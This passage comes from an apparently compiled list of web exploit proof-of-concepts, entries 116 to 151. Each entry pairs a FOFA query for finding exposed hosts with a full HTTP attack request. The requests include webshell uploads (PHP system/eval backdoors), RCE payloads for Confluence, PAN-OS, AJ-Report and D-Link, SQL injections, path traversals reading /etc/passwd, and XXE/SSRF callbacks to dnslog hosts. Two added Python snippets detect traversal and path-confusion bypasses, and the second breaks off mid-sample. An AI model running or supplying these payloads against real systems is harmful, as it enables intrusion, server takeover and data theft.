User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. 北京百绰 Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. 北京百绰 Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. 北京百绰 Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64 encoding of the SQL statement; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
CVE-2023-22527
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
The command output is returned in the X-Cmd-Response response header.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user is created, log in to the admin console directly; system commands can then be executed from there.

126. aiohttp path traversal
CVE-2024-23334
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 as a header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (科立讯) communication command and dispatch platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
CVE-2024-3272 (hard-coded mydlinkBRionyg account) / CVE-2024-3273 (command injection)
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the base64-encoded command to execute; aWQ= decodes to id.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
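Entries 126, 129 and 147 above, and the CVE-2024-27199 paths under entry 132, are the same defect seen four times: a client-supplied path is joined to a base directory (or a log directory, in the ColdFusion case) without checking where the joined path ends up. The Python below is an added example, not code from the original article or from any of the affected products; the request paths it scans are constructed from the POCs above. flag_traversals() is the log-review side (which requests resolved outside the mount they were requested under), safe_join() is the server-side check that the vulnerable handlers lack.

```python
"""Added example: path-traversal checks for the static-file and file-read
entries above. Not code from the original article or from any of the
products named; the sample paths are constructed from the POCs in this list."""
import posixpath
from urllib.parse import unquote

# Constructed request paths modelled on entries 126 (aiohttp /static),
# 147 (RaidenMAILD /webeditor) and CVE-2024-27199 (TeamCity /res), plus
# two benign requests for contrast.
SAMPLE_PATHS = [
    "/static/../../../../../etc/passwd",
    "/webeditor/../../../windows/win.ini",
    "/static/%2e%2e/%2e%2e/etc/passwd",   # percent-encoded dot segments
    "/res/../admin/diagnostic.jsp",
    "/static/css/site.css",
    "/res/logo.png",
]


def normalize_request_path(raw_path: str) -> str:
    """Return the path the file system would actually see.

    Percent-decoding is applied twice so double-encoded sequences
    (%252e%252e) collapse as well; backslashes are treated as separators
    because Windows targets (the RaidenMAILD case) accept them.
    """
    decoded = unquote(unquote(raw_path)).replace("\\", "/")
    return posixpath.normpath(decoded)


def escapes_prefix(raw_path: str, prefix: str) -> bool:
    """True when a request made under `prefix` resolves outside of it."""
    norm = normalize_request_path(raw_path)
    prefix = prefix.rstrip("/")
    return not (norm == prefix or norm.startswith(prefix + "/"))


def flag_traversals(paths, mounts):
    """Detection side: (path, mount) pairs whose normalized path leaves the
    mount it was requested under. Suitable for access-log review."""
    hits = []
    for path in paths:
        for mount in mounts:
            if path.startswith(mount + "/") and escapes_prefix(path, mount):
                hits.append((path, mount))
    return hits


def safe_join(root: str, user_path: str):
    """Server-side fix: resolve a user-controlled relative path under `root`
    and refuse anything whose normalized form leaves `root`.

    This is the check a file_name= parameter (entry 129) or a static-file
    handler (entry 126) needs. Returns the resolved path, or None to reject.
    """
    root = posixpath.normpath(root)
    # Drop leading separators so an absolute user path cannot replace root.
    relative = unquote(user_path).lstrip("/\\")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for path, mount in flag_traversals(SAMPLE_PATHS, ["/static", "/webeditor", "/res"]):
        print(f"{path!r} escapes {mount} -> {normalize_request_path(path)}")
    print(safe_join("/srv/static", "../../../etc/passwd"))   # rejected: None
    print(safe_join("/srv/static", "css/site.css"))          # /srv/static/css/site.css
```

Normalizing before the prefix check matters: a filter that only looks for the literal string "../" misses the percent-encoded form, which is why the third sample path is included.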

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

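Entries 132 and 149 to 151 above rely on one class of mistake: the authentication filter decides on the raw request URL while the servlet container routes on a cleaned-up one. A ";.jsp" suffix or a jsp= redirect (TeamCity CVE-2024-27198), a "/res/../" prefix (CVE-2024-27199) or a ";swagger-ui/" path parameter (AJ-Report) therefore reaches a protected handler while looking like a public resource. The Python below is an added example, not code from the original article, JetBrains or the AJ-Report project; the access-log lines are constructed from the POC requests above plus two legitimate requests that must not be flagged.

```python
"""Added example: spotting the path-confusion bypass shapes used by entries
132 (TeamCity CVE-2024-27198/27199) and 149-151 (AJ-Report ;swagger-ui/).
Not code from the original article or from either vendor; the log lines
below are constructed for the demonstration."""
import re
from urllib.parse import urlsplit

# Constructed combined-log lines modelled on the POC requests above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512
10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 2048
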